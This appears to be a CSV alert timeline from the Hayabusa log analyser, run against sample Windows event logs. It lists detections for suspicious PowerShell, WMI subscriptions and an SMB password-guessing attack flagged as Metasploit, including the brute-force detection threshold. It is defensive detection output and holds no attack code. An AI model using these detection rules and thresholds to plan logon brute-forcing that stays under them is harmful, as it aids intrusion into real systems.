Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 05:36:53.970 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:53:55.378 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:10:46.008 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:45:14.660 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:45:42.333 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:46:17.504 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:46:53.627 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:47:29.168 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:48:26.011 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:48:49.187 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:49:58.603 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:51:06.219 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:51:13.833 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:51:25.086 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:51:39.538 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:52:37.050 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:53:24.700 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:53:57.790 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 01:34:31.100 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : SubStatus: 0xc0000064 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- +2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 